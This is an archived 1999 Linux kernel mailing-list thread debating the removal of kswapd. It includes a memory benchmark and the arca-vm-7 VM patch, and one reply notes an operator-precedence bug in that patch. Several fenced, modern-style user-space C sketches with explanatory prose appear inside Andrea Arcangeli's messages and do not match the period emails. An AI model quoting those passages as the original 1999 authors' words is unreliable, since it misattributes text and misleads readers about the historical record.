  To: Alan Cox
  Cc: andrea, steve, bredelin, sct, linux-kernel, H.H.vanRiel, linux-mm



On Mon, 4 Jan 1999, Alan Cox wrote:
> > Boom. You just killed the machine with your patch, because maybe the
> > GFP_ATOMIC things are what the machine is doing. Imagine a machine that
> > acts as a router - it might not even be running any normal user processes
> > at _all_, but it had damn well better make sure that memory is always
> > available some way. "kswapd" did that for us, and Rik's happiness counts
> > as nothing in the face of basic facts of life like that. Sorry.
> 
> Its performance properties are very interesting however. They do seem to suggest
> kswapd should be more of a last resort. 

Agreed, I found that interesting too. The solution may just be to make
kswapd run a lot less often rather than removing it - for the
machine-killing out-of-memory situation it doesn't matter if kswapd runs
just a few times a second or something like that. 

However, one of the things I found so appealing with the patch was the
fact that it removed a lot of code, and that wouldn't be true for
something that just changed kswapd to run less often. Oh, well. 

		Linus


* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 20:56 62%                     ` Linus Torvalds
  1999-01-04 21:10 64%                       ` Rik van Riel
  1999-01-04 22:04 64%                       ` Alan Cox
@ 1999-01-04 22:29 64%                       ` Andrea Arcangeli
  2 siblings, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-04 22:29 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Steve Bergman, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

On Mon, 4 Jan 1999, Linus Torvalds wrote:

> GFP_ATOMIC things are what the machine is doing. Imagine a machine that
> acts as a router - it might not even be running any normal user processes

Argh, I hadn't thought of that; now I understand the point... But I am
pretty sure we can continue to do async swapout from the process path
as well. I think it works fine because swapout is now only a credit at
the bank. It is obviously faster because the process doesn't need to
block, so requesting many swapouts at one time dramatically improves
swapout I/O performance...

I am going to re-insert the poor kswapd now ;)

Thanks.

Andrea Arcangeli


* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 21:55 64%                         ` Linus Torvalds
@ 1999-01-04 22:51 64%                           ` Andrea Arcangeli
  1999-01-05  0:32 30%                             ` Andrea Arcangeli
  0 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-04 22:51 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Alan Cox, steve, bredelin, sct, linux-kernel, H.H.vanRiel,
	linux-mm

On Mon, 4 Jan 1999, Linus Torvalds wrote:

> However, one of the things I found so appealing with the patch was the
> fact that it removed a lot of code, and that wouldn't be true for
> something that just changed kswapd to run less often. Oh, well. 

We can still remove the dynamic prio thing and the
run-one-jiffy-and-schedule thing, since we no longer need kswapd to
provide swapout performance: the process is allowed to swap out
asynchronously and take its credit from the bank some time later...

We can simply call schedule() inside the kswapd engine whenever
need_resched is set.
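
The yield-when-asked loop can be sketched in user space as follows. This
is an illustration under assumptions, not the patch itself: struct sim,
need_resched() and reclaim_until_high() are hypothetical names, the
"scheduler" is modelled as a flag that becomes true every `slice` units
of work, and a counter stands in for the call to schedule().

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical simulation state (nothing here is a kernel structure). */
struct sim {
	unsigned long nr_free;		/* free pages */
	unsigned long high_mark;	/* stop once nr_free exceeds this */
	unsigned long tick;		/* units of work done so far */
	unsigned long slice;		/* a reschedule is requested every `slice` ticks */
	unsigned long yields;		/* how many times we gave the CPU away */
};

/* Model of the need_resched flag: set once per time slice. */
static bool need_resched(const struct sim *s)
{
	return s->tick % s->slice == 0;
}

/* Stand-in for one successful page-freeing step. */
static void free_one_page(struct sim *s)
{
	s->nr_free++;
	s->tick++;
}

/*
 * Keep freeing until the high watermark is exceeded, giving up the CPU
 * only when a reschedule has been requested, instead of sleeping after
 * a fixed amount of time.
 */
static void reclaim_until_high(struct sim *s)
{
	assert(s->slice > 0);
	for (;;) {
		free_one_page(s);
		if (s->nr_free > s->high_mark)
			break;
		if (need_resched(s))
			s->yields++;	/* the kernel would call schedule() here */
	}
}
```

The design point is that the loop has no time limit of its own: how long
it runs between yields is decided entirely by whoever sets the flag.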

I am going to do something like that right now...

Andrea Arcangeli


* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 22:04 64%                       ` Alan Cox
  1999-01-04 21:55 64%                         ` Linus Torvalds
@ 1999-01-04 22:43 56%                         ` Andrea Arcangeli
  1 sibling, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-04 22:43 UTC (permalink / raw)
  To: Alan Cox
  Cc: Linus Torvalds, steve, bredelin, sct, linux-kernel, H.H.vanRiel,
	linux-mm

On Mon, 4 Jan 1999, Alan Cox wrote:

> Its performance properties are very interesting however. They do seem to suggest
> kswapd should be more of a last resort. 

Steve just told me that the image test does not run as fast as with
arca-3 (the one before I inserted my new swap_out() smart weight code),
but here there is no doubt. My latest patch doubles performance under
swap here, and everything is _far_ more fluid (I only tried with
128 Mbyte of RAM, though). I went to the cinema in the meantime and
tried again just now, with the same results...

So that everyone can see the difference (and tell me if I am missing
something magic ;), here is the benchmark I am using:

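#include <stdio.h>
#include <stdlib.h>	/* malloc() */
#include <time.h>

int main(void)
{
	char *p[160];
	int i, j;
	int count;
	time_t start,stop;

	/* allocate 160 buffers of 1000000 bytes each */
	for (j=0; j<160; j++)
	{
		p[j] = malloc(1000000);
		if (!p[j])
		{
			perror("malloc");
			return 1;
		}
	}
	for (count=0;count<2000;count++)
	{
		start = time(NULL);
		/* write to every byte of every buffer */
		for (j=0; j<160; j++)
		{
			for (i=0; i<1000000; i++)
				p[j][i] = 0;
		}
		stop = time(NULL);
		/* the first pass is not reported */
		if (count)
			printf("elapsed %ld\n", (long) (stop-start));
		fflush(stdout);
	}
	return 0;
}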

The number 160 means that the benchmark reports the time in seconds it
takes to dirty 160 Mbyte of virtual memory, in a loop. It now runs in 54
seconds (against 100 before), and I am writing this in the meantime
without seeing any difference from an idle system (before, under the
same conditions, I could not open pine and sort a huge folder without
some kind of slowdown). My I/O is _slow_: I have _everything_ on a
6 Mbyte/sec IDE disk, and the seek time is really a pain (note that it's
the HD that is slow; I like IDE ;).

I am going to revert everything to arca-vm-3, except the new things that
doubled the benchmark performance and made the system far more fluid
(Steve reports arca-vm-3 to be the fastest VM out there under misc
swapping usage, i.e. the image test). I will probably keep the
swap_out() smart weight code, since it's really needed on low memory,
even though the swapout weight seems to cause a bit of slowdown,
probably because it's not tuned yet.
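
For readers who have not looked at the patch, the swapout weight can be
sketched in user space like this. It mirrors the calculation in
calc_swapout_weight() (sum of total_vm over swappable tasks with a
nonzero rss, divided by priority+1), but struct task, swapout_weight()
and scan_with_budget() are hypothetical stand-ins for illustration, with
no locking and no real task list.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, simplified view of a task (not struct task_struct). */
struct task {
	int swappable;			/* may this task be swapped at all? */
	unsigned long rss;		/* resident pages */
	unsigned long total_vm;		/* total mapped pages */
};

/*
 * Scan budget for one swap_out() call: the lower the priority number
 * (the more urgent the request), the more pages may be examined.
 */
static unsigned long swapout_weight(const struct task *tasks, size_t n,
				    unsigned int priority)
{
	unsigned long total_vm = 0;
	size_t i;

	assert(tasks != NULL || n == 0);
	for (i = 0; i < n; i++) {
		if (!tasks[i].swappable)
			continue;
		if (tasks[i].rss == 0)
			continue;
		total_vm += tasks[i].total_vm;
	}
	return total_vm / (priority + 1);
}

/*
 * Examine up to `pages` pages, charging one unit of budget per page and
 * stopping early when the budget reaches zero. Returns pages examined.
 */
static unsigned long scan_with_budget(unsigned long pages,
				      unsigned long *counter)
{
	unsigned long scanned = 0;

	while (scanned < pages && *counter != 0) {
		scanned++;
		--*counter;
	}
	return scanned;
}
```

In this model the budget is shared across every task visited in one call,
which is why the counter is passed down by pointer.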

Andrea Arcangeli


* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 20:56 62%                     ` Linus Torvalds
@ 1999-01-04 21:10 64%                       ` Rik van Riel
  1999-01-04 22:04 64%                       ` Alan Cox
  1999-01-04 22:29 64%                       ` Andrea Arcangeli
  2 siblings, 0 replies; 200+ results
From: Rik van Riel @ 1999-01-04 21:10 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Andrea Arcangeli, Steve Bergman, Benjamin Redelings I,
	Stephen C. Tweedie, linux-kernel, Alan Cox, linux-mm

On Mon, 4 Jan 1999, Linus Torvalds wrote:
> On Mon, 4 Jan 1999, Andrea Arcangeli wrote:
> >
> > I have a new revolutionary patch. The main thing is that I killed kswapd
> > just to make Rik happy ;).
> 
> You may have made Rik happy,

Not even that -- I really like the concept of a separate
thread doing the much needed page freeing...

> but you totally missed the reason for kswapd.  And while your
> patch looked interesting (a lot cleaner than the previous ones,
> and I _like_ patches that remove code), the fact that you killed
> kswapd means that it is essentially useless.

Yup -- a definite No-No.
(just to make sure that nobody would have really gotten
the impression that I would be happy with the removal
of kswapd)

cheers,

Rik -- If a Microsoft product fails, who do you sue?
+-------------------------------------------------------------------+
| Linux memory management tour guide.        riel@humbolt.geo.uu.nl |
| Scouting Vries cubscout leader.    http://humbolt.geo.uu.nl/~riel |
+-------------------------------------------------------------------+


* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-04 22:51 64%                           ` Andrea Arcangeli
@ 1999-01-05  0:32 30%                             ` Andrea Arcangeli
  1999-01-05  0:52 64%                               ` Zlatko Calusic
                                                 ` (2 more replies)
  0 siblings, 3 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-05  0:32 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Alan Cox, steve, bredelin, sct, linux-kernel, H.H.vanRiel,
	linux-mm

On Mon, 4 Jan 1999, Andrea Arcangeli wrote:

> I am going to do something like that right now...

Here is a new patch (arca-vm-7). It practically removes kswapd from
every path except ATOMIC memory allocation, and only when no process is
already freeing memory.

It also returns to the stock/arca-vm-3 shrink_mmap() (even if it seems
slower).
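
The do_free_page() helper in the patch below resumes where the previous
call stopped by jumping into the middle of a do/while loop with switch.
A minimal user-space sketch of that control-flow pattern, assuming two
made-up page sources, looks like this; struct sources, take() and
free_one() are hypothetical names, and only the switch-into-loop shape is
taken from the patch.

```c
#include <assert.h>

enum { STATE_USER_AND_CACHE = 0, STATE_SHM = 1 };

/* Hypothetical page sources: how many pages each one can still give up. */
struct sources {
	int user_and_cache;
	int shm;
};

/* Take one page from a source; returns 1 on success, 0 if it is empty. */
static int take(int *n)
{
	if (*n > 0) {
		(*n)--;
		return 1;
	}
	return 0;
}

/*
 * Free one page, starting with the source recorded in *state. A source
 * that succeeds keeps the turn for the next call; a source that fails
 * hands the turn to the other one. Returns 1 if a page was freed.
 */
static int free_one(int *state, struct sources *src)
{
	int priority = 8;

	assert(*state == STATE_USER_AND_CACHE || *state == STATE_SHM);
	switch (*state) {
		do {
		case STATE_USER_AND_CACHE:
			if (take(&src->user_and_cache))
				return 1;
			*state = STATE_SHM;
			/* fall through */
		case STATE_SHM:
			if (take(&src->shm))
				return 1;
			*state = STATE_USER_AND_CACHE;
		} while (--priority >= 0);
	}
	return 0;
}
```

Because the state lives in the caller, each call continues with the
source that last made progress instead of always restarting from the
first one.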

Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.9 linux/mm/vmscan.c:1.1.1.1.2.64
--- linux/mm/vmscan.c:1.1.1.9	Sat Jan  2 15:46:20 1999
+++ linux/mm/vmscan.c	Tue Jan  5 01:02:43 1999
@@ -10,6 +10,14 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Developed the balanced page freeing algorithm (do_free_user_and_cache).
+ * Developed a smart mechanism to handle the swapout weight.
+ * Allowed the process to swapout async and only then get the credit from
+ * the bank. This has doubled swapout performances and fluidness.
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -21,12 +29,15 @@
 #include <asm/pgtable.h>
 
 /* 
+ * Number of tasks that are currently freeing memory.
+ */
+static atomic_t nr_tasks_freeing_memory = ATOMIC_INIT(0);
+
+/* 
  * The wait queue for waking up the pageout daemon:
  */
 static struct task_struct * kswapd_task = NULL;
 
-static void init_swap_timer(void);
-
 /*
  * The swap-out functions return 1 if they successfully
  * threw something out, and we got a free page. It returns
@@ -163,7 +174,7 @@
 			 * cache. */
 			if (PageSwapCache(page_map)) {
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return 1;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -195,7 +206,7 @@
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return 1;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,9 +221,8 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
 	__free_page(page_map);
-	return entry;
+	return 1;
 }
 
 /*
@@ -230,7 +240,7 @@
  */
 
 static inline int swap_out_pmd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pte_t * pte;
 	unsigned long pmd_end;
@@ -251,18 +261,20 @@
 
 	do {
 		int result;
-		tsk->swap_address = address + PAGE_SIZE;
 		result = try_to_swap_out(tsk, vma, address, pte, gfp_mask);
+		address += PAGE_SIZE;
+		tsk->swap_address = address;
 		if (result)
 			return result;
-		address += PAGE_SIZE;
+		if (!--*counter)
+			return 0;
 		pte++;
 	} while (address < end);
 	return 0;
 }
 
 static inline int swap_out_pgd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pmd_t * pmd;
 	unsigned long pgd_end;
@@ -282,9 +294,11 @@
 		end = pgd_end;
 	
 	do {
-		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask);
+		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PMD_SIZE) & PMD_MASK;
 		pmd++;
 	} while (address < end);
@@ -292,7 +306,7 @@
 }
 
 static int swap_out_vma(struct task_struct * tsk, struct vm_area_struct * vma,
-	unsigned long address, int gfp_mask)
+	unsigned long address, int gfp_mask, unsigned long * counter)
 {
 	pgd_t *pgdir;
 	unsigned long end;
@@ -306,16 +320,19 @@
 
 	end = vma->vm_end;
 	while (address < end) {
-		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask);
+		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PGDIR_SIZE) & PGDIR_MASK;
 		pgdir++;
 	}
 	return 0;
 }
 
-static int swap_out_process(struct task_struct * p, int gfp_mask)
+static int swap_out_process(struct task_struct * p, int gfp_mask,
+			    unsigned long * counter)
 {
 	unsigned long address;
 	struct vm_area_struct* vma;
@@ -334,9 +351,12 @@
 			address = vma->vm_start;
 
 		for (;;) {
-			int result = swap_out_vma(p, vma, address, gfp_mask);
+			int result = swap_out_vma(p, vma, address, gfp_mask,
+						  counter);
 			if (result)
 				return result;
+			if (!*counter)
+				return 0;
 			vma = vma->vm_next;
 			if (!vma)
 				break;
@@ -350,6 +370,25 @@
 	return 0;
 }
 
+static inline unsigned long calc_swapout_weight(int priority)
+{
+	struct task_struct * p;
+	unsigned long total_vm = 0;
+
+	read_lock(&tasklist_lock);
+	for_each_task(p)
+	{
+		if (!p->swappable)
+			continue;
+		if (p->mm->rss == 0)
+			continue;
+		total_vm += p->mm->total_vm;
+	}
+	read_unlock(&tasklist_lock);
+
+	return total_vm / (priority+1);
+}
+
 /*
  * Select the task with maximal swap_cnt and try to swap out a page.
  * N.B. This function returns only 0 or 1.  Return values != 1 from
@@ -358,7 +397,10 @@
 static int swap_out(unsigned int priority, int gfp_mask)
 {
 	struct task_struct * p, * pbest;
-	int counter, assign, max_cnt;
+	int assign;
+	unsigned long counter, max_cnt;
+
+	counter = calc_swapout_weight(priority);
 
 	/* 
 	 * We make one or two passes through the task list, indexed by 
@@ -374,23 +416,17 @@
 	 * Think of swap_cnt as a "shadow rss" - it tells us which process
 	 * we want to page out (always try largest first).
 	 */
-	counter = nr_tasks / (priority+1);
-	if (counter < 1)
-		counter = 1;
-	if (counter > nr_tasks)
-		counter = nr_tasks;
-
-	for (; counter >= 0; counter--) {
+	while (counter != 0) {
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
 	select:
 		read_lock(&tasklist_lock);
-		p = init_task.next_task;
-		for (; p != &init_task; p = p->next_task) {
+		for_each_task(p)
+		{
 			if (!p->swappable)
 				continue;
-	 		if (p->mm->rss <= 0)
+	 		if (p->mm->rss == 0)
 				continue;
 			/* Refresh swap_cnt? */
 			if (assign)
@@ -410,10 +446,11 @@
 		}
 
 		/*
-		 * Nonzero means we cleared out something, but only "1" means
-		 * that we actually free'd up a page as a result.
+		 * Nonzero means we cleared out something, and "1" means
+		 * that we actually moved a page from the process memory
+		 * to the swap cache (it's not been freed yet).
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
+		if (swap_out_process(pbest, gfp_mask, &counter))
 			return 1;
 	}
 out:
@@ -441,39 +478,62 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-static int kswapd_free_pages(int kswapd_state)
+	/*
+	 * NOTE: Here we also allow the process to do async swapout,
+	 * because the swapout is really only a credit at the bank of
+	 * free memory right now. So we don't care to have it _now_.
+	 * Allowing async I/O dramatically improves swapout
+	 * performance. -arca (discovered this afternoon ;) 980105
+	 */
+	if (swap_out(priority, gfp_mask & ~__GFP_WAIT))
+		/*
+		 * We made at least some swapping progress, so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+
+	return 0;
+}
+
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 8;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		case 0:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 0;
 
-	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 8;
-		int count = pager_daemon.swap_cluster;
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+		} while (--priority >= 0);
+	}
+	return 0;
+}
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				free_memory(swap_out(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+static int kswapd_free_pages(int kswapd_state)
+{
+	for(;;)
+	{
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
+			break;
+		if (atomic_read(&nr_tasks_freeing_memory))
 			break;
-	} while (time_before_eq(jiffies,end_time));
+		if (kswapd_task->need_resched)
+			schedule();
+	};
 	return kswapd_state;
 }
 
@@ -496,13 +556,6 @@
 	lock_kernel();
 
 	/*
-	 * Set the base priority to something smaller than a
-	 * regular process. We will scale up the priority
-	 * dynamically depending on how much memory we need.
-	 */
-	current->priority = (DEF_PRIORITY * 2) / 3;
-
-	/*
 	 * Tell the memory management that we're a "memory allocator",
 	 * and that if we need more memory we should get access to it
 	 * regardless (see "try_to_free_pages()"). "kswapd" should
@@ -516,7 +569,6 @@
 	 */
 	current->flags |= PF_MEMALLOC;
 
-	init_swap_timer();
 	kswapd_task = current;
 	while (1) {
 		int state = 0;
@@ -543,107 +595,37 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 8;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		atomic_inc(&nr_tasks_freeing_memory);
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
+		atomic_dec(&nr_tasks_freeing_memory);
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
 
 	return retval;
 }
-
-/*
- * Wake up kswapd according to the priority
- *	0 - no wakeup
- *	1 - wake up as a low-priority process
- *	2 - wake up as a normal process
- *	3 - wake up as an almost real-time process
- *
- * This plays mind-games with the "goodness()"
- * function in kernel/sched.c.
- */
-static inline void kswapd_wakeup(struct task_struct *p, int priority)
-{
-	if (priority) {
-		p->counter = p->priority << priority;
-		wake_up_process(p);
-	}
-}
 
-/* 
- * The swap_tick function gets called on every clock tick.
- */
-void swap_tick(void)
+void kswapd_wakeup(void)
 {
-	struct task_struct *p = kswapd_task;
-
-	/*
-	 * Only bother to try to wake kswapd up
-	 * if the task exists and can be woken.
-	 */
-	if (p && (p->state & TASK_INTERRUPTIBLE)) {
-		unsigned int pages;
-		int want_wakeup;
-
-		/*
-		 * Schedule for wakeup if there isn't lots
-		 * of free memory or if there is too much
-		 * of it used for buffers or pgcache.
-		 *
-		 * "want_wakeup" is our priority: 0 means
-		 * not to wake anything up, while 3 means
-		 * that we'd better give kswapd a realtime
-		 * priority.
-		 */
-		want_wakeup = 0;
-		pages = nr_free_pages;
-		if (pages < freepages.high)
-			want_wakeup = 1;
-		if (pages < freepages.low)
-			want_wakeup = 2;
-		if (pages < freepages.min)
-			want_wakeup = 3;
-	
-		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
-}
+	struct task_struct * p = kswapd_task;
 
-/* 
- * Initialise the swap timer
- */
-
-void init_swap_timer(void)
-{
-	timer_table[SWAP_TIMER].expires = jiffies;
-	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	if (p && (p->state & TASK_INTERRUPTIBLE) &&
+	    !atomic_read(&nr_tasks_freeing_memory))
+		wake_up_process(p);
 }
Index: linux/mm/page_alloc.c
diff -u linux/mm/page_alloc.c:1.1.1.5 linux/mm/page_alloc.c:1.1.1.1.2.15
--- linux/mm/page_alloc.c:1.1.1.5	Sun Jan  3 20:42:44 1999
+++ linux/mm/page_alloc.c	Tue Jan  5 01:13:00 1999
@@ -151,7 +151,6 @@
 	if (!PageReserved(page) && atomic_dec_and_test(&page->count)) {
 		if (PageSwapCache(page))
 			panic ("Freeing swap cache page");
-		page->flags &= ~(1 << PG_referenced);
 		free_pages_ok(page->map_nr, 0);
 		return;
 	}
@@ -173,7 +172,6 @@
 		if (atomic_dec_and_test(&map->count)) {
 			if (PageSwapCache(map))
 				panic ("Freeing swap cache pages");
-			map->flags &= ~(1 << PG_referenced);
 			free_pages_ok(map_nr, order);
 			return;
 		}
@@ -260,7 +258,8 @@
 		if (nr_free_pages > freepages.min) {
 			if (!current->trashing_memory)
 				goto ok_to_allocate;
-			if (nr_free_pages > freepages.low) {
+			if (!(current->flags & PF_MEMALLOC) &&
+			    nr_free_pages > freepages.low) {
 				current->trashing_memory = 0;
 				goto ok_to_allocate;
 			}
@@ -271,8 +270,11 @@
 		 * memory.
 		 */
 		current->trashing_memory = 1;
-		if (!try_to_free_pages(gfp_mask, SWAP_CLUSTER_MAX) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
+		if (!try_to_free_pages(gfp_mask, freepages.high - nr_free_pages + 1<<order) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
 			goto nopage;
+	} else {
+		if (nr_free_pages < freepages.min)
+			kswapd_wakeup();
 	}
 ok_to_allocate:
 	spin_lock_irqsave(&page_alloc_lock, flags);
Index: linux/include/linux/mm.h
diff -u linux/include/linux/mm.h:1.1.1.3 linux/include/linux/mm.h:1.1.1.1.2.13
--- linux/include/linux/mm.h:1.1.1.3	Sat Jan  2 15:24:18 1999
+++ linux/include/linux/mm.h	Mon Jan  4 18:42:52 1999
@@ -118,7 +118,6 @@
 	unsigned long offset;
 	struct page *next_hash;
 	atomic_t count;
-	unsigned int unused;
 	unsigned long flags;	/* atomic flags, some possibly updated asynchronously */
 	struct wait_queue *wait;
 	struct page **pprev_hash;
@@ -295,8 +294,7 @@
 
 /* filemap.c */
 extern void remove_inode_page(struct page *);
-extern unsigned long page_unuse(struct page *);
-extern int shrink_mmap(int, int);
+extern int FASTCALL(shrink_mmap(int, int));
 extern void truncate_inode_pages(struct inode *, unsigned long);
 extern unsigned long get_cached_page(struct inode *, unsigned long, int);
 extern void put_cached_page(unsigned long);
Index: linux/mm/swap.c
diff -u linux/mm/swap.c:1.1.1.5 linux/mm/swap.c:1.1.1.1.2.8
--- linux/mm/swap.c:1.1.1.5	Sat Jan  2 15:24:40 1999
+++ linux/mm/swap.c	Sat Jan  2 21:40:13 1999
@@ -64,13 +64,13 @@
 swapstat_t swapstats = {0};
 
 buffer_mem_t buffer_mem = {
-	2,	/* minimum percent buffer */
+	5,	/* minimum percent buffer */
 	10,	/* borrow percent buffer */
 	60	/* maximum percent buffer */
 };
 
 buffer_mem_t page_cache = {
-	2,	/* minimum percent page cache */
+	5,	/* minimum percent page cache */
 	15,	/* borrow percent page cache */
 	75	/* maximum */
 };
Index: linux/include/linux/swap.h
diff -u linux/include/linux/swap.h:1.1.1.4 linux/include/linux/swap.h:1.1.1.1.2.10
--- linux/include/linux/swap.h:1.1.1.4	Tue Dec 29 01:39:03 1998
+++ linux/include/linux/swap.h	Tue Jan  5 01:12:59 1999
@@ -83,6 +83,7 @@
 
 /* linux/mm/vmscan.c */
 extern int try_to_free_pages(unsigned int gfp_mask, int count);
+extern void kswapd_wakeup(void);
 
 /* linux/mm/page_io.c */
 extern void rw_swap_page(int, unsigned long, char *, int);
@@ -167,9 +168,11 @@
 	count = atomic_read(&page->count);
 	if (PageSwapCache(page))
 	{
+#if 0
 		/* PARANOID */
 		if (page->inode != &swapper_inode)
 			panic("swap cache page has wrong inode\n");
+#endif
 		count += swap_count(page->offset) - 2;
 	}
 	if (PageFreeAfter(page))


Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 30%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-05  0:32 30%                             ` Andrea Arcangeli
@ 1999-01-05  0:52 64%                               ` Zlatko Calusic
  1999-01-05  3:02 64%                               ` Zlatko Calusic
  1999-01-05 15:35 28%                               ` arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]] Andrea Arcangeli
  2 siblings, 0 replies; 200+ results
From: Zlatko Calusic @ 1999-01-05  0:52 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Linus Torvalds, Alan Cox, steve, bredelin, sct, linux-kernel,
	H.H.vanRiel, linux-mm

Andrea Arcangeli <andrea@e-mind.com> writes:

> -		if (!try_to_free_pages(gfp_mask, SWAP_CLUSTER_MAX) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
> +		if (!try_to_free_pages(gfp_mask, freepages.high - nr_free_pages + 1<<order) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
                                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

How about a pair of parentheses at a strategic place? :)

Other than that, your previous (-6?) patch works really well here.

I once wanted to get rid of kswapd, too, but I thought it would
surely harm performance, so I dumped the idea. Now, I'm not at all sure. :)

Keep trying!
-- 
Zlatko

^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-05  0:32 30%                             ` Andrea Arcangeli
  1999-01-05  0:52 64%                               ` Zlatko Calusic
@ 1999-01-05  3:02 64%                               ` Zlatko Calusic
  1999-01-05 11:49 64%                                 ` Andrea Arcangeli
  1999-01-05 15:35 28%                               ` arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]] Andrea Arcangeli
  2 siblings, 1 reply; 200+ results
From: Zlatko Calusic @ 1999-01-05  3:02 UTC (permalink / raw)
  To: Andrea Arcangeli
